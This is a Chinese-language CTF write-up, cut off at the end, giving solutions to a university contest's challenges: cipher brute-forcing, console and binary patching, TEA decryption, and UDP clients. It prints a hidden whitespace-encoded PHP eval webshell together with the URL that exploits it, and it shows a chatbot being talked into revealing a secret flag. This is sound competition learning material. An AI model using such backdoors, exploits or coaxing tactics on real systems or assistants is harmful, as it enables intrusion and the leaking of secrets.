东北大学第二届 NEX CTF 题解

头一次参加这种竞赛,感觉算是目前我遇到最有意思的一个校园竞赛了。

签到喵

海报图最底下是摩斯密码,找个解密器就行。

1
.... ...-- .---- .. --- ..--.- .-- --- .-. .---- -..

Flag Installer

只要躲开所有流氓软件,且选择自定义安装,不要使用快速安装,即可获得前半部分flag。(金山毒霸、小鸟壁纸、贪玩蓝月、日历人生等)。同时在自定义安装的时候,需要把Access数据库勾上,这样的话在安装目录就会出现一个mdb文件,可以使用Excel打开查看后半部分flag。

两部分合并即为Flag。

alt text

alt text

从0开始的CPP生活

这是在考C++成员函数的使用?(

直接在main函数里写上:

1
std::cout << flag.GetFlag() << std::endl;

即可。甚至还有注释提示……

alt text

时光机器

按照要求,先用 win /s 打开Win3.1,然后打开画图板,之后打开图片文件即可。

alt text

凯撒超进化

按照题意来说,这是Vigenère cipher加密,因为提示key的长度为3,则可以暴力枚举偏移量。符合要求的key一共有 $262626 == 17576$ 种,完全可以打暴力。

不过这题考的是这个算法的理解,我一开始以为大写小写要一起加上偏移,导致WA。而且非字母元素需要跳过。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#include <bits/stdc++.h>
using namespace std;
#define veci vector<int>
string encode = "bdr{jka3bdlS_k5_50_Y45M_guvZboguV4}";

string getans(veci&key)
{
    // 仅在处理字母的时候,才改变key的下标
    string ans = "";
    int j=0;
    for(int i=0;i<encode.size();i++)
    {
        auto&c = encode[i];
        if(c>='a'&&c<='z')ans+=((int)c-'a'-key[j%3]+26)%26 + 'a', j++;
        else if(c>='A'&&c<='Z')ans+=((int)c-'A'-key[j%3]+26)%26 + 'A', j++;
        else ans += c;
    }
    return ans;
}
// vector<char> alp;
// vector<int> vis;
// void dfs(vector<int>&val,int d)
// {
//     if(d==3)
//     {
//         string key = "";
//         for(const auto&i:val)key+=alp[i];
//         string ans = getans(key);
//         if(ans[0]=='n'&&ans[1]=='e'&&ans[2]=='x')cout<<ans<<endl;
//         return;
//     }
//     for(int i=0;i<alp.size();i++)
//     {
//         if(!vis[i])
//         {
//             vis[i]=1;
//             val.push_back(i);
//             dfs(val,d+1);
//             val.pop_back();
//             vis[i]=0;
//         }
//     }
// }
int main()
{
    // for(char a='a';a<='z';a++)alp.push_back(a);
    // for(char a='A';a<='Z';a++)alp.push_back(a);
    // vis.resize(alp.size());
    // vector<int>val;
    // dfs(val,0);
    veci key(3);
    for(int i=0;i<=26;i++)for(int j=0;j<=26;j++)for(int k=0;k<=26;k++)
    {
        key[0]=i;
        key[1]=j;
        key[2]=k;
        string ans = getans(key);
        if(ans[0]=='n'&&ans[1]=='e'&&ans[2]=='x')cout<<ans<<endl;
    }
    return 0;
}

alt text

隐秘的角落

看图片+地图,感觉是浑南的建筑学馆。但是不知道层数,从1开始枚举,到3的时候AC了,就是这样(

一觉醒来全世界计

首先打开Google浏览器,检查查看JavaScript代码,本来想看一下 completeChallenge() 函数的代码,不知道为什么加载不出来。然后直接在Console里调用了一下,发现在Console中只要执行 completeChallenge() 无论当前状态是什么样都会结束比赛。这个时候我想去尝试让计数器始终为0,但没有实现。后来尝试使用手速调用 completeChallenge() 发现还是比不过瓜哥。但是后来发现有个startTime变量,给他赋一个非常大的整数,就过了。

alt text

浮屠塔的出口

在Linux Bash下直接用nc连接目标服务器即可。然后手动模拟就可以了。

alt text

迷失于梦境中的光

最经典的一种图片隐写了,使用WinHex打开,发现flag就在最后几字节。

但是我受了测试题的影响,以为还是藏在图片上的,然后最后一个点的时候才过了(

alt text

来自远古小恐龙的挑战书

首先先把网页的index.js下载下来,然后翻代码。

找代码肯定是要先找提交分数或者判断分数部分的。

在800多行的时候翻到了这个:

1
2
3
4
5
6
const score = Math.ceil(this.distanceMeter.getActualDistance(this.distanceRan));
if (score <= (114514+114514)*(-11-4+5+14)+114*514+114*51*4+1+145*14-11-4+5+14) {
    this.showDialog('\u0043\u006f\u006d\u0065\u0020\u006f\u006e\u0021\u0020\u0059\u006f\u0075\u0020\u0061\u0072\u0065\u0020\u006e\u006f\u0077\u0020' + score.toString() + '\u0020\u002f\u0020\u0039\u0039\u0039\u0039\u0039\u0039\u0020\u0073\u0063\u006f\u0072\u0065\u0073\u0020\u0062\u0065\u0068\u0069\u006e\u0064\u0020\u0079\u006f\u0075\u0072\u0020\u0066\u006c\u0061\u0067\u0021');
} else {
    this.showDialog('\u0043\u006f\u006e\u0067\u0072\u0061\u0074\u0075\u006c\u0061\u0074\u0069\u006f\u006e\u0073\u0021\u0020\u004c\u0065\u0074\u0027\u0073\u0020\u0062\u0065\u006c\u0069\u0065\u0076\u0065\u0020\u0079\u006f\u0075\u0020\u0061\u0072\u0065\u0020\u0061\u0020\u0072\u0065\u0061\u006c\u0020\u0068\u0061\u0063\u006b\u0065\u0072\u0020\u0028\u0062\u0075\u0074\u0020\u006e\u006f\u0074\u0020\u0061\u0020\u0063\u0068\u0065\u0061\u0074\u0065\u0072\u0020\u003a\u0029\u0021\n\n' + getMilestone());
}

那个分数正好就是所需要的分数,然后下面是字符串”Congratulations! Let’s believe you are a real hacker (but not a cheater :)!\n\n”,所以getMilestone()肯定是获取答案的函数。

于是顺腾摸瓜,找到这个函数,copy出来运行在浏览器的Console控制台上就可以了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
function decodeBase64ToArrayBuffer(base64String) {
        var len = (base64String.length / 4) * 3;
        var str = atob(base64String);
        var arrayBuffer = new ArrayBuffer(len);
        var bytes = new Uint8Array(arrayBuffer);

        for (var i = 0; i < len; i++) {
            bytes[i] = str.charCodeAt(i);
        }
        return bytes.buffer;
    }
function getMilestone() {
        const encBytes = new Uint8Array(decodeBase64ToArrayBuffer("BA5MPjpiM18jJVMaBjkPYAIuawJGGzVrHg4MKkE3MwEX"));
        const keyBytes = new TextEncoder().encode("jk4ErVP4");
        const milBytes = new Uint8Array(encBytes.length);
        for (let i = 0; i < encBytes.length; i++) {
            milBytes[i] = encBytes[i] ^ keyBytes[i % keyBytes.length];
        }
        return new TextDecoder().decode(milBytes);
    }

alt text

开源逆向题喵

先跑了一下程序。发现两个Drag Me部分能被拖动,而点到Dont Drag Me会执行一分钟后关机。
打开x64dbg,先把这烦人的关机给nop掉,给CreateProcess打个断点。刚进入Api函数时,栈顶就是函数的返回地址,故可以找到执行关机的部分。

把此处调用CreateProcess的函数nop掉(RVA=0x118A4B),这样他就不会执行关机。

alt text

直接 补丁->修补文件。

然后我最开始的想法是,这三个玩意是按钮,会在主窗口的回调函数里创建。创建按钮应该也是CreateWindow函数(有没有别的方法就不确定了,好久不用winapi写软件了……)。于是我截断了RegisterClassExW函数,因为给它传递的结构体里有主窗口的回调函数。据此跟踪到:

alt text

(RVA=0x258320)

但是在这打断点显然不是什么明智选择,因为窗口稍微有个消息就断。

回调函数里有两个用户模块函数的调用,第一个特别短感觉不像,于是看了第二个函数。

alt text

(RVA=0x1E59D0)

可以肯定的是,逻辑函数肯定在这里面。因为底下有什么TrackMouseEvent什么的,感觉像是。

但是这里面代码量太大了,去分析他太浪费时间了。

于是我又想到一点,Drag Me可能是字符串(也有可能直接逐字节画在窗口的),于是搜索了在这个模块下Drop Me字符串的引用:

alt text

引用量居然这么少。这个时候我的想法就是把Dont Drag Me变成Drap Me那样的形式,于是我先去研究了Drag Me。

alt text

(RVA=0x258F43)发现他一直断,说明这部分代码也是在回调函数里调用的,通过直接搜索字符串我直接跳过了大量需要分析的代码。

我本来是想研究一下这两个函数的行为的,于是先全部nop掉看有什么变化,没想到这个按钮居然没了?

alt text

我没想到这个按钮是在回调函数里实时创建的,说不准这个根本就不是按钮。

但不管了,我直接使用同样的方法把Dont Drag Me整掉就行。

alt text

(RVA=0x259073)答案莫名其妙的就做出来了。

最终结论,只要在RVA=0x259073处将两个call变成nop即可获得flag。

破解 DNA 之密

合理想象到AGCT是4进制数字,每四个字母正好组成一字节数据。只不过暂时不知道AGCT的映射,用dfs搜索答案即可,情况数为4的排列,即24种。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include <bits/stdc++.h>
#define veci vector<int>
#define mpci map<char,int>
using namespace std;

veci vis(4);
veci idx(4);
mpci mp;
string pat="CATA CACC CTAG CTAT CACG CGTA CGGC CCTT CGAA CCCC CCGT GTCT CCTT GTCC CATT CCTT CCGT CGTT CAGC CAAT CACG CATA CCCT GTCG CGAA CGCG CCCT CACG GTCG CCCT CACG CTCT CAGC GTGC CACG CTCT GTCG CGTT CGAA CGCG CTTC";
void dfs(int d)
{
    if(d==4)
    {
        mp['A']=idx[0];
        mp['G']=idx[1];
        mp['T']=idx[2];
        mp['C']=idx[3];
        //41个
        string ans;
        for(int i=0;i<41;i++)
        {
            int tmp=0;
            for(int j=0;j<4;j++)
            {
                tmp*=4;
                tmp+=mp[pat[5*i+j]];
            }
            ans+=(char)tmp;
        }
        if(ans[0]=='n'&&ans[1]=='e'&&ans[2]=='x')
        {
            cout<<ans<<endl;
        }
        return;
    }
    for(int i=0;i<4;i++)
    {
        if(!vis[i])
        {
            vis[i]=1;
            idx[d]=i;
            dfs(d+1);
            vis[i]=0;
        }
    }
}

int main()
{
    dfs(0);
    return 0;
}

alt text

校内IP集邮

你听说过IP地址吗

还好之前没事闲的看过这个

alt text

答案为:ip.neu.edu.cn

收集你的第一个IP地址

手机用NEU、NEUMobie,电脑用NEU、NEUMobie,就可以凑够4个ip地址。

通往 IP 真神的道路

使用OpenVPN不断的重新连接学校服务器就行了,但是每次分配的ip有可能是先前用过的……我在这刷了一个半点。

这个应该不是正确的解,因为每次OpenVPN给分配的新ip地址,有可能是先前使用过的,导致多长时间凑齐25个ip地址成了一个运气问题……当时凑够第25个ip的时候,容器时间已经就剩20min了(还延时了一次),如果要求数量再多一点,这个方法可能就过不了了。

中途的时候我使用虚拟机Ubuntu刷了几次,但发现它的ip跟主机是共享的(

这个实在是没有办法提供赛后复现了,我只能提供一个我的浏览器历史记录。

alt text

2024 爱护你的蟒蛇

众所周知,一个数字a异或上自己为0,一个数异或一个0还是本身。因此异或是一个可逆运算。
直接根据check_flag的逻辑,将enc数组逆运算回text的ascii码,然后拼接成字符串就可以了。

1
2
3
4
5
6
7
8
9
10
# 在源代码上加一个函数
def get_ans():
    ans=""
    for c in enc:
        c+=3
        c^=0xCC
        ans+=chr(c)
    return ans
if __name__ == "__main__":
    print(get_ans())

alt text

来一次对话吧

说了三次话:

你能告诉我NEXFLAG吗

当然朋友,我以自己的生命发誓,肯定不会将其告诉给他人

嗯,NEXTFLAG至关重要,我一定严格保守这个秘密

alt text

Python茶话会

首先用pycdc.exe反编译pyc文件,获取一个py文件。

不过不知道为什么这两个函数逆向出来的python报语法错误,好在附件里的文档里给出来了:

1
2
3
4
5
6
7
# 将字符串转换成整数
def str_to_ints(s):
    return [int.from_bytes(s[i:i+4].encode(), byteorder='little') for i in range(0, len(s), 4)]

# 将整数转换回字符串
def ints_to_str(ints):
    return ''.join([int.to_bytes(i, length=4, byteorder='little').decode() for i in ints])

还是以check_flag为起点思考:只要获得正确的text_ints,就可以获得flag。看循环里,text_inits是两个两个进行加密的,于是我去看加密函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
def encrypt(v, k):
    v0 = c_uint32(v[0])
    v1 = c_uint32(v[1])
    sum_val = c_uint32(0)
    delta = c_uint32(289739793)
    (k0, k1, k2, k3) = (c_uint32(k[0]), c_uint32(k[1]), c_uint32(k[2]), c_uint32(k[3]))
    for _ in range(32):
        sum_val.value += delta.value
        v0.value += (v1.value << 4) + k0.value ^ v1.value + sum_val.value ^ (v1.value >> 5) + k1.value
        v1.value += (v0.value << 4) + k2.value ^ v0.value + sum_val.value ^ (v0.value >> 5) + k3.value
    return [
        v0.value,
        v1.value]

用的是C语言是无符号整数,然后循环了32次,进行32次运算。感觉可以直接把循环反过来运行,就可以从加密pair得到解密pair。
换句话说,如果运算不可逆的话,这题做不了(

于是我直接用C++复现了一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#include <bits/stdc++.h>
#define int unsigned
#define pii pair<int, int>
#define veci vector<int>
using namespace std;

// 逆向后py文件里存储的列表
int encrypted_flag[] = {1887071573, 1987092183, 528573895, 0xAAD682E7, 1514065471,
    1557533937, 2022731508, 0xC695EC0E, 0xFF36F6EA, 0xE7B3EC45, 2120747857, 0xE5D2379D};
int key[] = {305419896, 0x9ABCDEF0, 0xFEDCBA98, 1985229328};

pii encrypt(pii v)
{
    int v0 = v.first;
    int v1 = v.second;
    int sum = 0;
    int delta=289739793;
    int k0 = key[0];
    int k1 = key[1];
    int k2 = key[2];
    int k3 = key[3];
    for(int _=0;_<32;_++)
    {
        sum += delta;
        v0 += (v1<<4) + k0 ^ v1 + sum ^ (v1>>5) + k1;
        v1 += (v0<<4) + k2 ^ v0 + sum ^ (v0>>5) + k3;
        // v0.value += (v1.value << 4) + k0.value ^ v1.value + sum_val.value ^ (v1.value >> 5) + k1.value
        // v1.value += (v0.value << 4) + k2.value ^ v0.value + sum_val.value ^ (v0.value >> 5) + k3.value
    }
    return {v0, v1};
}

pii decrypt(pii v)
{
    int v0 = v.first;
    int v1 = v.second;
    int delta=289739793;
    int k0 = key[0];
    int k1 = key[1];
    int k2 = key[2];
    int k3 = key[3];
    int sum = 0;
    for(int _=0;_<32;_++)sum+=delta;
    for(int _=0;_<32;_++)
    {
        v1 -= (v0<<4) + k2 ^ v0 + sum ^ (v0>>5) + k3;
        v0 -= (v1<<4) + k0 ^ v1 + sum ^ (v1>>5) + k1;
        sum -= delta;
    }
    return {v0, v1};
}

signed main()
{
    veci ans;
    for(int i=0;i<12;i+=2)
    {
        pii t = decrypt({encrypted_flag[i],encrypted_flag[i+1]});
        ans.push_back(t.first);
        ans.push_back(t.second);
    }
    cout<<'[';
    for(const auto&x:ans)cout<<x<<", ";
    cout<<"]"<<endl;
    return 0;
}

注意的是在循环开始的时候sum应该是delta*32,而且是一个溢出的负数。

获取text_inits后再用python的函数跑一下,得到flag。

alt text

alt text

admin@trustme.com

直接用Outlook邮箱打开就可以获得附件。

alt text

真正的逆向

假面之下的 Flag

首先运行程序,发现是控制台应用。用x64dbg打开,去找main函数:

EP处肯定不是main函数,因为还有几个初始化函数。

跳过所有库函数,找到main函数的起点。寻找方法是不断尝试步过call,看哪个会执行getchar。

RVA=0x1450

alt text

然后随手试了一下,发现Flag Hidden这句话跟Flag是挨在一起的……

alt text

感觉甚至不需要开x64dbg,直接winhex找字符串都行。

这题感觉有亿点水。

条件判断

还是控制台函数,还是去找main函数:

alt text

(RVA=0x1732)

然后步过每一个语句,输入1,盯紧条件跳转,发现这里跳过了大量的指令:

alt text

于是将这个跳转nop掉,即可获得答案。

alt text

答案自动获取器

先运行看看效果,发现只要鼠标接近它他就会移动。

因为还是Windows程序,所以老办法,截断RegisterClassEx,获取主窗口的回调函数:

alt text

(RVA=0x12610)

这个主调函数比开源那个逆向人性化多了,只有一个用户函数,那肯定是处理小球逻辑的。

alt text

我先把他直接nop掉了,发现小球卡死,没有任何效果,说明获取Flag也在这个函数里面……

然后进入函数,发现有个jmp rax跳转幅度非常大,给nop掉发现还是卡死……

alt text

于是又换了一个思路。因为程序只在鼠标接近的时候才乱跑,因此肯定是获取鼠标位置了,因此截断GetCursorPos函数。

alt text

(RVA=0x7C64)

只要不执行下面的SetWindowPos,小球就没办法乱跑了。

我把下方临近的SetWindowPos函数nop掉(RVA=0x7DB9),小球就安详的固定在这里了。

alt text

但现在想了一想,直接去找SetWindowPos不就得了,哪需要想这么多()

愤怒喵 NaN~

因为之前从来没有分析过Linux的二进制文件,以为自己不一定能写的上。

好在也是Intel指令集,能用IDA静态分析一下,发现代码思路倒是挺简单的:导入了322个外部函数,每个函数都是传递两个参数,然后如果函数返回0则直接No。
在这依托函数调用前有一个打开flag.png的文件,合理怀疑这一坨函数是用来检验flag图片是否正确的。

文件夹目录提示我要用Angr,但是文档看不懂……(T_T)
首先分析一下这一坨外部函数的形参,应该是两个双字数据,但实际上只需要一字节就可以了(因为在调用的时候用了movzx指令,每次调用函数相当于只传递了一字节)

然后IDA看了一下结构,发现代码结构几乎没有差别:

alt text

但是每个函数传递的字节顺序是没有规律的,不能直接去暴力枚举每个字节的取值。
但是函数调用长得差不多啊,于是我把这一坨代码的机器码单独copy了出来(text.75C1~text.A1A3)存成一个bin文件。

对于我们来说只有 movzx eax,[rbp+val] 的val是有意义的,使用x64dbg自己写几个movzx指令,发现对应有两个机器码:

1
2
0F B6 85 + 四字节偏移
0F B6 45 + 单字节偏移

于是使用Python写了一个脚本,存储了一下所有用到的offset。

计算之后发现提取的偏移最大值-最小值+1确实等于322,也就是打开文件时传给fread的值。

别忘了补码的问题,为了写下标方便,我给负数取了绝对值,当然我们这种情况肯定是所有偏移都是负数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
def changeint(value):
    if value < 0 or value > 4294967295:
        raise ValueError("Input must be a 32-bit unsigned integer (0-4294967295).")
    if value < 2147483648:
        return value
    else:
        return value - 4294967296

def changechar(value):
    if value < 0 or value > 255:
        raise ValueError("Input must be an 8-bit unsigned integer (0-255).")
    if value < 128:
        return value
    else:
        return value - 256

if __name__ == "__main__":
    f = open("Problem.bin", "rb")
    data = f.read()
    f.close()
    cnt = 0
    fg = 0
    l = []
    offset = []
    for c in data:
        l.append(c)
    for i in range(len(l)-2):
        if l[i]==0x0f and l[i+1]==0xb6 and (l[i+2]==0x85 or l[i+2]==0x45):
            if l[i+2]==0x45:    # 单字节偏移
                offset.append(abs(changechar(l[i+3])))
            else:   # 四字节偏移,注意是LE模式
                tmp=[l[i+6],l[i+5],l[i+4],l[i+3]]
                ans=0
                for x in tmp:
                    ans<<=8
                    ans|=x
                offset.append(abs(changeint(ans)))
    # f=open("out.txt","w")
    # print(offset,file=f)
    # f.close()
    print(max(offset),min(offset))
    print(len(offset))
    print(offset)

alt text

说明我们正确的获取了调用每一个函数前执行的movzx指令所使用的偏移。

然后我用C++写了依托(当然是用python脚本生成的)

1
extern "C" fx(int a,int b);

用于连接外部函数,同时编译的时候要写这么一大坨:

alt text

然后枚举a从0到255,b从0到255,获得每一个fx对应的值,存储在 vector<pair<int,int> > ans中。定义一个dat字节数组,存放暴力出来的字节数据即可。

但是发现形参b始终为0。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
vecpi ans;
for(int i=0;i<n;i+=2)
{
    for(int a=0;a<256;a++)for(int b=0;b<256;b++)
    {
        // esi和edi的顺序
        if(getF(i/2,a,b))
        {
            dat[offset[i+1]]=(char)a;
            //dat[offset[i]]=(char)b;
            ans.push_back({a,b});
            goto succ;
        }
    }
    succ:
    continue;
}
for(const auto&p:p)cout<<p.first<<' '<<p.second<<endl;

alt text

这里需要注意的是,所有fx的形参b都是0,说明有可能它对应的偏移也是没有实际意义的。
我在这里卡了好几个小时,甚至重新计算了偏移数组、不断交换改变fx的形参,最后才突然注意到b始终为0,赋值的话可能会破坏先前保存的数据……
估计这是一个特意设计的迷惑点吧。

然后我们存储图片的时候,我们需要将从一堆f里判断出来的字节保存在dat数组中,存储322字节的数据,因为我们在python中获取的offset数组的最小值是15,最大值是336,说明dat数组中偏移15~336的共322字节是我们所存储的,其他多余的字节不能多存。

1
2
3
std::ofstream outFile("flag.png", std::ios::binary);
outFile.write(dat+mi,mx-mi+1);
outFile.close();

从Ubuntu中copy出来这个png文件,用WinHex打开:

alt text

需要注意的是,偏移量是从汇编码里获得到的,而且取了绝对值,它是一个栈上的变量,故最后需要将所有字节翻转一下。就得到了图片。

alt text

完整的C++和Python代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#include <bits/stdc++.h>
using namespace std;
#define veci vector<int>
#define pii  pair<int,int>
#define vecpi vector<pair<int,int> >

// 由Python处理
int offset[]={161, 75, 274, 300, 257, 283, 217, 258, 229, 241, 170, 65, 336, 261, 279, 198, 176, 84, 117, 334, 33, 102, 70, 121, 26, 242, 181, 288, 78, 222, 163, 319, 235, 59, 135, 321, 258, 62, 220, 85, 142, 88, 206, 315, 211, 168, 206, 265, 210, 139, 311, 294, 246, 317, 73, 154, 329, 246, 249, 106, 181, 28, 280, 187, 263, 36, 256, 114, 294, 322, 75, 101, 283, 212, 328, 127, 161, 182, 241, 19, 75, 64, 208, 115, 29, 269, 81, 128, 196, 178, 318, 235, 97, 237, 304, 218, 95, 239, 287, 257, 19, 24, 307, 63, 17, 116, 110, 273, 82, 268, 335, 120, 253, 98, 25, 255, 54, 299, 110, 56, 59, 131, 217, 336, 164, 181, 283, 99, 291, 132, 221, 158, 241, 90, 186, 316, 274, 209, 213, 80, 258, 125, 307, 35, 68, 238, 18, 23, 169, 15, 178, 331, 294, 169, 237, 167, 218, 26, 51, 142, 16, 318, 110, 251, 282, 170, 23, 61, 277, 180, 93, 20, 292, 301, 287, 42, 162, 46, 252, 60, 173, 328, 155, 185, 225, 49, 131, 220, 328, 130, 65, 285, 300, 81, 59, 203, 202, 144, 292, 197, 129, 72, 186, 192, 336, 33, 102, 67, 290, 214, 65, 201, 234, 148, 39, 256, 138, 310, 164, 43, 215, 38, 237, 172, 43, 254, 258, 173, 333, 250, 74, 287, 229, 133, 120, 27, 65, 240, 221, 137, 318, 303, 256, 55, 224, 140, 28, 243, 92, 163, 137, 329, 143, 113, 314, 156, 320, 58, 90, 232, 137, 282, 40, 236, 87, 229, 298, 94, 61, 73, 84, 200, 261, 305, 309, 135, 70, 146, 44, 71, 150, 213, 95, 302, 178, 227, 280, 279, 41, 260, 102, 204, 79, 267, 195, 205, 298, 249, 290, 280, 243, 118, 77, 188, 301, 159, 77, 123, 159, 274, 177, 330, 170, 138, 123, 112, 283, 134, 275, 86, 115, 32, 276, 96, 52, 162, 97, 281, 123, 53, 185, 95, 327, 231, 155, 70, 323, 233, 239, 208, 329, 40, 125, 189, 68, 161, 221, 219, 76, 295, 259, 136, 147, 179, 143, 149, 205, 245, 251, 147, 26, 87, 99, 216, 30, 206, 328, 111, 18, 262, 197, 110, 118, 223, 292, 93, 115, 221, 132, 291, 75, 326, 316, 45, 265, 275, 178, 18, 257, 244, 239, 186, 272, 31, 228, 333, 175, 150, 307, 226, 89, 69, 83, 119, 277, 22, 172, 325, 228, 107, 288, 92, 42, 196, 33, 293, 70, 155, 144, 296, 18, 171, 34, 152, 274, 91, 245, 332, 301, 217, 252, 266, 199, 97, 258, 230, 17, 215, 329, 277, 294, 286, 124, 52, 225, 108, 302, 39, 60, 151, 59, 327, 34, 141, 104, 78, 284, 177, 336, 289, 334, 195, 307, 30, 106, 307, 249, 89, 179, 47, 282, 16, 26, 202, 217, 323, 109, 247, 309, 44, 82, 194, 34, 117, 106, 253, 279, 37, 199, 270, 172, 153, 188, 320, 211, 74, 159, 211, 90, 308, 74, 311, 124, 252, 199, 34, 315, 234, 106, 129, 313, 278, 300, 304, 50, 143, 193, 313, 230, 276, 151, 190, 66, 82, 61, 21, 232, 272, 149, 297, 58, 166, 111, 41, 50, 193, 170, 57, 292, 314, 324, 77, 184, 105, 194, 76, 135, 228, 197, 199, 215, 306, 60, 164, 324, 17, 64, 263, 312, 292, 200, 210, 303, 160, 335, 79, 173, 145, 264, 124, 236, 175, 218, 54, 125, 68, 214, 100, 21, 103, 130, 183, 68, 259, 183, 48, 317, 324, 151, 248, 74, 109, 51, 264, 277, 66, 37, 176, 333, 225, 27, 207, 207, 104, 305, 335, 16, 191, 285, 122, 212, 309, 130, 290, 182, 51, 283, 126, 189, 50, 151, 184, 16, 25, 127, 298, 287, 174, 133, 224, 324, 312, 178, 157, 250, 271, 288, 165, 257, 284, 202, 29, 140, 83};
char dat[500];
extern "C" int f0(int a,int b);
extern "C" int f1(int a,int b);
extern "C" int f2(int a,int b);
// 太占地方了,省略...

int getF(int i,int a,int b)
{
    switch (i)
    {
        case 0:return f0(a,b);
        case 1:return f1(a,b);
        case 2:return f2(a,b);
        // 太占地方了,省略...
    }
}
int main()
{
    int mx=0;
    int n = sizeof(offset)/sizeof(int);
    int mi = 0x3f3f3f3f;
    for(int i=0;i<n;i++)mx=max(mx,offset[i]),mi=min(mi,offset[i]);
    // cout<<mx<<endl;
    // set<int>h;
    // for(int i=0;i<n;i++)h.insert(offset[i]);
    // cout<<h.size()<<endl;
    // cout<<n<<endl;
    vecpi ans;
    for(int i=0;i<n;i+=2)
    {
        for(int a=0;a<256;a++)for(int b=0;b<256;b++)
        {
            // esi和edi的顺序
            if(getF(i/2,a,b))
            {
                dat[offset[i+1]]=(char)a;
                //dat[offset[i]]=(char)b;
                ans.push_back({a,b});
                goto succ;
            }
        }
        succ:
        continue;
    }
    for(const auto&p:ans)cout<<p.first<<' '<<p.second<<endl;
    std::ofstream outFile("flag.png", std::ios::binary);
    outFile.write(dat+mi,mx-mi+1);
    outFile.close();
    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

def changeint(value):
    if value < 0 or value > 4294967295:
        raise ValueError("Input must be a 32-bit unsigned integer (0-4294967295).")
    if value < 2147483648:
        return value
    else:
        return value - 4294967296

def changechar(value):
    if value < 0 or value > 255:
        raise ValueError("Input must be an 8-bit unsigned integer (0-255).")
    if value < 128:
        return value
    else:
        return value - 256

if __name__ == "__main__":
    f = open("Problem.bin", "rb")
    data = f.read()
    f.close()
    cnt = 0
    fg = 0
    l = []
    offset = []
    for c in data:
        l.append(c)
    for i in range(len(l)-2):
        if l[i]==0x0f and l[i+1]==0xb6 and (l[i+2]==0x85 or l[i+2]==0x45):
            if l[i+2]==0x45:
                offset.append(abs(changechar(l[i+3])))
            else:
                tmp=[l[i+6],l[i+5],l[i+4],l[i+3]]
                ans=0
                for x in tmp:
                    ans<<=8
                    ans|=x
                offset.append(abs(changeint(ans)))
    # f=open("out.txt","w")
    # print(offset,file=f)
    # f.close()
    print(max(offset),min(offset))
    print(len(offset))


def reversebytes(input_file, output_file):
    with open(input_file, 'rb') as f:
        content = f.read()
    reversed_content = content[::-1]
    with open(output_file, 'wb') as f:
        f.write(reversed_content)

if __name__ == "__main__":
    reversebytes("flag.png","out.png")

# if __name__ == "__main__":
#     for i in range(0,322):
#         print(f"extern \"C\" int f{i}(int a,int b);")

(赛后补充:似乎此解法非预期,纯属是暴力出奇迹了……)

初识UDP

用Python写个代码就行了:

1
2
3
4
5
6
7
8
9
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
    data = input()
    if data == "quit":
        break
    s.sendto(data.encode(),("202.199.6.66" ,35366))
    print(s.recv(1024).decode())

alt text

列出端口清单

写个udp客户端,等就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import socket

def udp_client():
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    local_address = ('0.0.0.0', 60000)
    client_socket.bind(local_address)
    try:
        print('Waiting for response...')
        data, server = client_socket.recvfrom(4096)
        print(f'Received: {data.decode()}')
        data, server = client_socket.recvfrom(4096)
        print(f'Received: {data.decode()}')
    finally:
        print('Closing socket')
        client_socket.close()


if __name__ == '__main__':
    udp_client()

alt text

Uncontrollable

首先用 os.listdir('/') 获取根目录的文件信息

alt text

之后打开文件,然后读取就可以了。

alt text

Don’t Touch My Code!

阅读PHP代码,发现是将本身脚本文件的所有空格提取出来,计算成二进制,然后转成字符串,传给了eval函数,我用Python复现一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import re

def step2(matches):
    binary_string = ''
    for whitespace_sequence in matches:
        count = len(whitespace_sequence)
        binary_string += '0' if count % 2 == 0 else '1'
    return binary_string

def step3(binary_string):
    hex_string = ''
    binary_length = len(binary_string)
    for i in range(0, binary_length, 4):
        chunk = binary_string[i:i + 4]
        if len(chunk) < 4:
            chunk = chunk.ljust(4, '0')
        hex_digit = hex(int(chunk, 2))[2:]
        hex_string += hex_digit
    decoded_string = ''
    for i in range(0, len(hex_string), 2):
        hex_byte = hex_string[i:i + 2]
        if len(hex_byte) == 2:
            decoded_string += chr(int(hex_byte, 16))

    return decoded_string

php = open(r'index.php', 'r')
content = php.read()
php.close()

res = re.findall(r'[   \t]+', content)
print(res)
bin_str = step2(res)
print(bin_str)
hex_str = step3(bin_str)
print(hex_str)

然后获得字符串 echo "Hello, World!";eval($_REQUEST["step000000"]??"");

我们发现还有个eval函数,执行的是请求中的step000000的参数,于是构造url:

1
/?step000000=highlight_file%28%27flag%27%29%3B

就可以获得flag了。

alt text

智慧学园的召集令

首先使用 pyinstxtractor.py 从打包好的exe文件里提取处pyc,并补充pyc的头部16个字节。然后就可以使用pycdc反编译pyc文件至py文件。

pyinstxtractor.py 需要用Python27才能跑起来。

分析py代码,有这么大串的判断条件:

1
